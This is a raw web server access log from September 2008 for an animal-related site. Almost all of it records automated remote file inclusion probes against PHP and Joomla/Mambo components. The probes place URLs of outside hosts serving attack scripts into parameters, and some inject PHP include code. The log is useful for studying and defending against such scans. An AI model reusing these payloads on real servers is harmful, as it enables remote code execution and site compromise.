200.14.46.18 - - [07/Sep/2008:01:25:20 -0700] "GET /logs/access.log//templates/mangobery/footer.sample.php?Site_Path=http://www.ozwebfx.com/articledirectory/demonstration/backup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
200.14.46.18 - - [07/Sep/2008:01:25:20 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://www.ozwebfx.com/articledirectory/demonstration/backup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
200.14.46.18 - - [07/Sep/2008:01:25:23 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.ozwebfx.com/articledirectory/demonstration/backup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
72.55.156.116 - - [07/Sep/2008:01:26:55 -0700] "GET //components/com_flyspray/startdown.php?file=http://rock.ge/images/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "theanimalnetwork.net"
72.55.156.116 - - [07/Sep/2008:01:26:55 -0700] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://rock.ge/images/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "theanimalnetwork.net"
72.55.156.116 - - [07/Sep/2008:01:26:55 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://rock.ge/images/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "theanimalnetwork.net"
63.247.141.8 - - [07/Sep/2008:01:32:50 -0700] "GET /logs//update/update2.php?lang=http://oursoultvxq.com/bbs/data/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "theanimalnetwork.net"
63.247.141.8 - - [07/Sep/2008:01:32:50 -0700] "GET //update/update2.php?lang=http://oursoultvxq.com/bbs/data/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "theanimalnetwork.net"
72.55.156.116 - - [07/Sep/2008:01:33:08 -0700] "GET /logs/access_080724.log//components/com_flyspray/startdown.php?file=http://rock.ge/images/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "theanimalnetwork.net"
201.6.118.215 - - [07/Sep/2008:01:34:07 -0700] "GET /logs/access_080723.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://66.7.207.244/~vivafeli/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
74.200.202.37 - - [07/Sep/2008:01:35:39 -0700] "GET /?sourcedir=http://www.seomen.com/amember/id.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.811" "theanimalnetwork.net"
74.200.202.37 - - [07/Sep/2008:01:35:39 -0700] "GET /logs/access.log/?sourcedir=http://www.seomen.com/amember/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "theanimalnetwork.net"
74.200.202.37 - - [07/Sep/2008:01:35:39 -0700] "GET /logs/?sourcedir=http://www.seomen.com/amember/id.txt??? HTTP/1.1" 200 1796 "-" "libwww-perl/5.811" "theanimalnetwork.net"
66.103.128.44 - - [07/Sep/2008:01:39:58 -0700] "GET //cms/modules/form.lib.php?sourceFolder=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "theanimalnetwork.net"
66.103.128.44 - - [07/Sep/2008:01:39:59 -0700] "GET /logs//cms/modules/form.lib.php?sourceFolder=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "theanimalnetwork.net"
69.41.180.138 - - [07/Sep/2008:01:41:50 -0700] "GET /logs/errors.php?error=http://lansites.ru//language/lang_english/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "theanimalnetwork.net"
69.41.180.138 - - [07/Sep/2008:01:41:50 -0700] "GET /errors.php?error=http://lansites.ru//language/lang_english/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "theanimalnetwork.net"
85.25.129.240 - - [07/Sep/2008:01:42:55 -0700] "GET /errors.php?error=http://lansites.ru//language/lang_english/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "theanimalnetwork.net"
85.25.129.240 - - [07/Sep/2008:01:42:55 -0700] "GET /logs/errors.php?error=http://lansites.ru//language/lang_english/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "theanimalnetwork.net"
78.83.255.201 - - [07/Sep/2008:01:43:34 -0700] "GET /logs/?sourcedir=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 200 1796 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "theanimalnetwork.net"
78.83.255.201 - - [07/Sep/2008:01:43:34 -0700] "GET /?sourcedir=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 200 779 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "theanimalnetwork.net"
202.181.105.117 - - [07/Sep/2008:01:43:43 -0700] "GET /errors.php?error=http://lansites.ru//language/lang_english/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "theanimalnetwork.net"
202.181.105.117 - - [07/Sep/2008:01:43:44 -0700] "GET /logs/errors.php?error=http://lansites.ru//language/lang_english/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "theanimalnetwork.net"
85.25.150.230 - - [07/Sep/2008:01:44:44 -0700] "GET /errors.php?error=http://lansites.ru//language/lang_english/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "theanimalnetwork.net"
85.25.150.230 - - [07/Sep/2008:01:44:44 -0700] "GET /logs/errors.php?error=http://lansites.ru//language/lang_english/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "theanimalnetwork.net"
82.194.86.185 - - [07/Sep/2008:01:46:10 -0700] "GET /logs/access.log/?sourcedir=http://www.spd-esens.de/spd/contentimage/readme1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "theanimalnetwork.net"
66.103.131.81 - - [07/Sep/2008:01:46:11 -0700] "GET /logs/access.log/?sourcedir=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "theanimalnetwork.net"
66.103.131.81 - - [07/Sep/2008:01:46:11 -0700] "GET /?sourcedir=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.811" "theanimalnetwork.net"
66.103.131.81 - - [07/Sep/2008:01:46:11 -0700] "GET /logs/?sourcedir=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 200 1796 "-" "libwww-perl/5.811" "theanimalnetwork.net"
82.194.86.185 - - [07/Sep/2008:01:46:11 -0700] "GET /?sourcedir=http://www.spd-esens.de/spd/contentimage/readme1.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.812" "theanimalnetwork.net"
82.194.86.185 - - [07/Sep/2008:01:46:11 -0700] "GET /logs/?sourcedir=http://www.spd-esens.de/spd/contentimage/readme1.txt?? HTTP/1.1" 200 1796 "-" "libwww-perl/5.812" "theanimalnetwork.net"
69.42.221.130 - - [07/Sep/2008:01:47:45 -0700] "GET /logs/access.log/errors.php?error=http://waktu.hut2.ru/sca/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
69.42.221.130 - - [07/Sep/2008:01:47:45 -0700] "GET /errors.php?error=http://waktu.hut2.ru/sca/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
69.42.221.130 - - [07/Sep/2008:01:47:45 -0700] "GET /logs/errors.php?error=http://waktu.hut2.ru/sca/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
205.211.11.1 - - [07/Sep/2008:01:48:41 -0700] "GET /logs/access.log/errors.php?error=http://waktu.hut2.ru/aDu/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
205.211.11.1 - - [07/Sep/2008:01:48:41 -0700] "GET /errors.php?error=http://waktu.hut2.ru/aDu/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
205.211.11.1 - - [07/Sep/2008:01:48:42 -0700] "GET /logs/errors.php?error=http://waktu.hut2.ru/aDu/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
202.142.212.1 - - [07/Sep/2008:01:49:42 -0700] "GET /logs/access.log/?sourcedir=http://wp1004891.wp009.webpack.hosteurope.de/otto/readme1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "theanimalnetwork.net"
202.142.212.1 - - [07/Sep/2008:01:49:44 -0700] "GET /?sourcedir=http://wp1004891.wp009.webpack.hosteurope.de/otto/readme1.txt? HTTP/1.1" 200 779 "-" "libwww-perl/5.64" "theanimalnetwork.net"
202.142.212.1 - - [07/Sep/2008:01:49:45 -0700] "GET /logs/?sourcedir=http://wp1004891.wp009.webpack.hosteurope.de/otto/readme1.txt? HTTP/1.1" 200 1796 "-" "libwww-perl/5.64" "theanimalnetwork.net"
205.211.11.1 - - [07/Sep/2008:01:50:01 -0700] "GET /errors.php?error=http://waktu.hut2.ru/aDu/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
205.211.11.1 - - [07/Sep/2008:01:51:41 -0700] "GET /logs/access.log/errors.php?error=http://waktu.hut2.ru/aDu/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
205.211.11.1 - - [07/Sep/2008:01:51:41 -0700] "GET /errors.php?error=http://waktu.hut2.ru/aDu/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
205.211.11.1 - - [07/Sep/2008:01:51:41 -0700] "GET /logs/errors.php?error=http://waktu.hut2.ru/aDu/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
205.211.11.1 - - [07/Sep/2008:01:51:48 -0700] "GET /logs/access.log/errors.php?error=http://waktu.hut2.ru/aDu/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
205.211.11.1 - - [07/Sep/2008:01:51:48 -0700] "GET /errors.php?error=http://waktu.hut2.ru/aDu/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
205.211.11.1 - - [07/Sep/2008:01:51:49 -0700] "GET /logs/errors.php?error=http://waktu.hut2.ru/aDu/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
87.248.181.211 - - [07/Sep/2008:01:52:21 -0700] "GET /phpbb/forum/index.php HTTP/1.0" 404 275 "http://theanimalnetwork.net/phpbb/forum/index.php" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0" "theanimalnetwork.net"
87.248.181.211 - - [07/Sep/2008:01:52:21 -0700] "GET / HTTP/1.0" 200 763 "http://theanimalnetwork.net/" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0" "theanimalnetwork.net"
87.248.181.211 - - [07/Sep/2008:01:52:22 -0700] "GET / HTTP/1.0" 200 763 "http://theanimalnetwork.net/" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0" "theanimalnetwork.net"
202.142.212.1 - - [07/Sep/2008:01:52:46 -0700] "GET /?sourcedir=http://wp1004891.wp009.webpack.hosteurope.de/otto/readme1.txt? HTTP/1.1" 200 779 "-" "libwww-perl/5.64" "theanimalnetwork.net"
88.116.96.124 - - [07/Sep/2008:01:53:28 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://ich-lebe.de/images/stories/stories/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "theanimalnetwork.net"
217.128.122.28 - - [07/Sep/2008:01:53:32 -0700] "GET /?sourcedir=http://www.ballettschule-tulln.at/htaccess/t.txt??? HTTP/1.1" 200 779 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "theanimalnetwork.net"
217.128.122.28 - - [07/Sep/2008:01:53:32 -0700] "GET /logs/?sourcedir=http://www.ballettschule-tulln.at/htaccess/t.txt??? HTTP/1.1" 200 1796 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "theanimalnetwork.net"
122.201.81.53 - - [07/Sep/2008:01:53:57 -0700] "GET /?sourcedir=http://willsponsor.org/.cgi/psy-bnc??? HTTP/1.1" 200 779 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "theanimalnetwork.net"
122.201.81.53 - - [07/Sep/2008:01:53:57 -0700] "GET /logs/?sourcedir=http://willsponsor.org/.cgi/psy-bnc??? HTTP/1.1" 200 1796 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "theanimalnetwork.net"
205.211.11.1 - - [07/Sep/2008:01:55:08 -0700] "GET /errors.php?error=http://waktu.hut2.ru/aDu/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
205.211.11.1 - - [07/Sep/2008:01:55:09 -0700] "GET /errors.php?error=http://waktu.hut2.ru/aDu/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
212.7.31.201 - - [07/Sep/2008:01:59:09 -0700] "GET /logs/access.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://125.214.65.34/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
212.7.31.201 - - [07/Sep/2008:01:59:09 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://125.214.65.34/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
212.7.31.201 - - [07/Sep/2008:01:59:10 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://125.214.65.34/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
66.103.128.44 - - [07/Sep/2008:02:01:18 -0700] "GET /?sourcedir=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 200 779 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "theanimalnetwork.net"
66.103.128.44 - - [07/Sep/2008:02:01:19 -0700] "GET /logs/?sourcedir=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 200 1796 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "theanimalnetwork.net"
151.11.24.250 - - [07/Sep/2008:02:05:29 -0700] "GET /logs/access.log/?sourcedir=http://www.fullscores.com/mambots/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "theanimalnetwork.net"
151.11.24.250 - - [07/Sep/2008:02:05:29 -0700] "GET /?sourcedir=http://www.fullscores.com/mambots/poll/osid6.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "theanimalnetwork.net"
151.11.24.250 - - [07/Sep/2008:02:05:30 -0700] "GET /logs/?sourcedir=http://www.fullscores.com/mambots/poll/osid6.txt?? HTTP/1.1" 200 1796 "-" "libwww-perl/5.79" "theanimalnetwork.net"
140.174.118.146 - - [07/Sep/2008:02:08:19 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "theanimalnetwork.net"
202.142.212.1 - - [07/Sep/2008:02:08:25 -0700] "GET /logs/access_080722.log/?sourcedir=http://wp1004891.wp009.webpack.hosteurope.de/otto/readme1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "theanimalnetwork.net"
66.7.207.104 - - [07/Sep/2008:02:08:31 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "theanimalnetwork.net"
64.15.129.168 - - [07/Sep/2008:02:09:48 -0700] "GET /logs/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.muhtaroglu.com.tr/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "theanimalnetwork.net"
64.15.129.168 - - [07/Sep/2008:02:10:05 -0700] "GET /component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.muhtaroglu.com.tr/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "theanimalnetwork.net"
217.160.189.11 - - [07/Sep/2008:02:10:16 -0700] "GET //forum/?sourcedir=http://www.unixserv.net/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
212.7.31.201 - - [07/Sep/2008:02:11:04 -0700] "GET /logs/access.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://125.214.65.34/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
212.7.31.201 - - [07/Sep/2008:02:11:05 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://125.214.65.34/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
212.7.31.201 - - [07/Sep/2008:02:11:05 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://125.214.65.34/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
140.174.118.146 - - [07/Sep/2008:02:12:03 -0700] "GET /logs/access_080723.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "theanimalnetwork.net"
140.174.118.146 - - [07/Sep/2008:02:12:04 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "theanimalnetwork.net"
140.174.118.146 - - [07/Sep/2008:02:12:04 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "theanimalnetwork.net"
140.174.118.146 - - [07/Sep/2008:02:12:26 -0700] "GET /logs/access_080722.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "theanimalnetwork.net"
66.7.207.104 - - [07/Sep/2008:02:12:45 -0700] "GET /logs/access_080723.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "theanimalnetwork.net"
66.7.207.104 - - [07/Sep/2008:02:12:45 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "theanimalnetwork.net"
66.7.207.104 - - [07/Sep/2008:02:12:46 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "theanimalnetwork.net"
62.87.154.41 - - [07/Sep/2008:02:12:51 -0700] "GET /?sourcedir=http://www.huskerland.net/id.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.803" "theanimalnetwork.net"
216.12.80.220 - - [07/Sep/2008:02:12:51 -0700] "GET /logs/access.log/?sourcedir=http://www.fullscores.com/mambots/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "theanimalnetwork.net"
216.12.80.220 - - [07/Sep/2008:02:12:51 -0700] "GET /?sourcedir=http://www.fullscores.com/mambots/poll/osid6.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.65" "theanimalnetwork.net"
62.87.154.41 - - [07/Sep/2008:02:12:52 -0700] "GET /logs/access.log/?sourcedir=http://www.huskerland.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
62.87.154.41 - - [07/Sep/2008:02:12:52 -0700] "GET /logs/?sourcedir=http://www.huskerland.net/id.txt??? HTTP/1.1" 200 1796 "-" "libwww-perl/5.803" "theanimalnetwork.net"
212.7.31.201 - - [07/Sep/2008:02:13:50 -0700] "GET /logs/access.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://125.214.65.34/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
212.7.31.201 - - [07/Sep/2008:02:13:51 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://125.214.65.34/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
212.7.31.201 - - [07/Sep/2008:02:13:51 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://125.214.65.34/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
66.7.207.104 - - [07/Sep/2008:02:13:57 -0700] "GET /logs/access_080722.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "theanimalnetwork.net"
59.125.183.76 - - [07/Sep/2008:02:13:58 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://socomalliance.com/Ladders/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "theanimalnetwork.net"
59.125.183.76 - - [07/Sep/2008:02:13:59 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://socomalliance.com/Ladders/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "theanimalnetwork.net"
66.7.207.104 - - [07/Sep/2008:02:13:59 -0700] "GET //oneadmin/photogallery/include.php?path[docroot]=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "theanimalnetwork.net"
59.125.183.76 - - [07/Sep/2008:02:13:59 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://socomalliance.com/Ladders/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "theanimalnetwork.net"
88.116.96.124 - - [07/Sep/2008:02:15:24 -0700] "GET /logs/access_080721.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://ich-lebe.de/images/stories/stories/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "theanimalnetwork.net"
88.116.96.124 - - [07/Sep/2008:02:15:25 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://ich-lebe.de/images/stories/stories/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "theanimalnetwork.net"
88.116.96.124 - - [07/Sep/2008:02:15:25 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://ich-lebe.de/images/stories/stories/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "theanimalnetwork.net"
72.55.156.116 - - [07/Sep/2008:02:16:23 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://rock.ge/images/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "theanimalnetwork.net"
72.55.156.116 - - [07/Sep/2008:02:16:23 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://rock.ge/images/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "theanimalnetwork.net"
72.55.156.116 - - [07/Sep/2008:02:16:23 -0700] "GET /logs/access_080724.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://rock.ge/images/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "theanimalnetwork.net"
72.55.156.116 - - [07/Sep/2008:02:16:23 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://rock.ge/images/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.theanimalnetwork.net"
72.55.156.116 - - [07/Sep/2008:02:16:23 -0700] "GET /logs/access.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://rock.ge/images/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.theanimalnetwork.net"
72.55.156.116 - - [07/Sep/2008:02:16:23 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://rock.ge/images/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.theanimalnetwork.net"
140.174.118.146 - - [07/Sep/2008:02:17:08 -0700] "GET //oneadmin/photogallery/include.php?path[docroot]=http://208.46.111.12/images/images.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "theanimalnetwork.net"
217.128.122.28 - - [07/Sep/2008:02:17:45 -0700] "GET //convert/mvcw.php?step=1&vwar_root=http://www.ballettschule-tulln.at/htaccess/t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "theanimalnetwork.net"
217.128.122.28 - - [07/Sep/2008:02:17:45 -0700] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://www.ballettschule-tulln.at/htaccess/t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "theanimalnetwork.net"
140.174.118.146 - - [07/Sep/2008:02:17:53 -0700] "GET /logs/access_080723.log//oneadmin/photogallery/include.php?path[docroot]=http://208.46.111.12/images/images.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "theanimalnetwork.net"
140.174.118.146 - - [07/Sep/2008:02:17:53 -0700] "GET //oneadmin/photogallery/include.php?path[docroot]=http://208.46.111.12/images/images.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "theanimalnetwork.net"
140.174.118.146 - - [07/Sep/2008:02:17:53 -0700] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://208.46.111.12/images/images.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "theanimalnetwork.net"
81.171.86.86 - - [07/Sep/2008:02:18:22 -0700] "GET //components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://www.snapshotjourneys.com/lib/adodb_lite/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "theanimalnetwork.net"
66.7.207.104 - - [07/Sep/2008:02:18:28 -0700] "GET /logs/access_080723.log//oneadmin/photogallery/include.php?path[docroot]=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "theanimalnetwork.net"
74.6.22.104 - - [07/Sep/2008:02:20:15 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.theanimalnetwork.net"
72.30.134.178 - - [07/Sep/2008:02:20:15 -0700] "GET /phpbb/forum HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.theanimalnetwork.net"
